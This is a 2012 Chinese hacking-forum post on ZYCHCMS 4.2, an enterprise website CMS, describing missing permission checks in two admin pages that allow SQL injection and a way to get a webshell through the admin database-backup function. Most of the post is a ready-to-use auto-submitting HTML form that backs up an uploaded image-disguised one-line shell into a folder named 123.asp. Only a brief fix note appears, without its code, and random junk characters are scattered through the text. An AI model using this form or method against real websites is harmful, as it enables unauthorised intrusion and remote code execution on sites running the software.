找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1813|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
3 {' X& Y4 W* y* j# H6 h, R9 r$ A9 m" t

& U" [  _. g; x: @3 m1 A" n5 P$ B: G) x3 {0 R
( m9 g- P/ c  A! @/ ^$ R
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
4 r& {1 x7 a: G2 E7 E ①SQL注射漏洞
8 l/ ]4 m/ K  ]* k1 V 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
) {* z* c+ T  l6 ]1 W  A, v& e 漏洞原因:未过滤; [5 `6 k0 j# L" }! d, V
漏洞代码:
* d$ U0 E3 y( b% Y& G1 Z! ~" e" b 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
0 R4 l; ]- c' F3 }: o  E7 U 修复方法:在文件开头加入代码
% O: Z8 N8 a8 w' [& ^: V& J+ o 5 G6 ?- O5 A3 A
9 Y& R, D* }3 e0 y2 P3 ~3 u: p& K
②后台拿WBSHELL- V; u4 k9 A1 a2 t* u( W4 L; Y
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
1 B6 |# u$ L& ]3 ] 这里在网上找了一个,改了下,将就着用。
9 w* K0 A5 h0 S+ }& x 以下是代码本地提交代码
9 P# B3 }$ A1 l4 }$ D: c " j$ U6 {) U; U) b  r  ~
- O% ?: |- x7 [6 R( p* c  k
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>$ A8 R; n, N1 a* G2 ?9 ]/ ?
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>; W+ c5 j- \1 t: {4 [
<tr>6 _4 r3 g; }1 G- ~
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>0 r! }. c9 \( _
</tr>
! n# l3 s- u9 P <tr>7 g( T( m6 |0 ^" M
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>5 F/ l5 U6 o4 v; M( y; @
</span>- v0 U3 b" j5 i: K. e
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >9 ]4 m8 E  x0 v/ X+ U9 W
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >' P; W9 D  w$ C" w
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>( a# b7 F4 B! O( R$ Y
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d# V8 ~2 H! ~4 h( M
<div align=”left”>& S$ F9 D6 b: ?( F7 u! j8 e$ }
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
) A% h$ [  Q. i: _( u <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>( z) j9 H7 i* q! m' w. K
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />1 f" a. N0 k8 w2 W. Y
</div></td>) L0 j) }- k+ g$ D( v2 d4 d3 [! R
</tr>
7 i. A+ _& ]4 k0 i <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
0 D! F0 E" [$ @, e6 M  M <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>6 b* G% m  \, E2 b
<td class=”td”><div align=”left”># k# z0 t6 M; w% J
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
' `' ?4 W% D3 a' _$ r  E- n  V# B [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>/ R+ v8 J% a( ?9 h2 B9 R! \% ^
</tr>
3 y8 t2 P0 r6 n8 v <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
, y$ ~, n: q& n3 F! u <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>! D/ g/ E3 F3 u. U( T/ N" }
<td class=”td”><div align=”left”>
* G; c: T. |. @# z <input type=”submit” value=”确定备份” class=”btn”+ [7 D9 V- \( R) W& @
</div></td>
- r( d3 ^* W+ j8 f </tr>
1 y* j, S2 @/ C/ u5 h </table></td></tr></form>
6 y; P7 P( \" U" d( ?2 x </table>
  O5 y* c( L4 c/ [* F: ~+ ] </td>
' ^# L0 m3 M! S+ m4 r% C </tr>
1 P% I2 F" i0 M5 Z/ Z5 K </table>( Q  j/ l  r7 p' W  m
<script>. `' d: \. G0 v* r* n& R
document.all.add.submit();9 p/ E- H; f" h1 M! ?
</script>2 Q9 z9 K, L& Z# g

7 e* D; ?5 G2 E8 A* m; }2 M
( g3 L# a9 W$ V0 k7 _& ?" w% ?1 m. z. D, W! W1 w: M; {' Z2 P0 }
3 x- t; V8 D- o: p
8 I9 O/ C/ {  Z1 }# l# Q  E$ v

+ m9 q" ?7 t% A' W, P& ^' O6 L9 H$ b7 T2 ^8 p! U! U

9 f, Y! c1 K  m7 s1 f8 P. [0 }4 c
: f  J  c+ c: Z6 a+ N1 b7 i" D+ n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表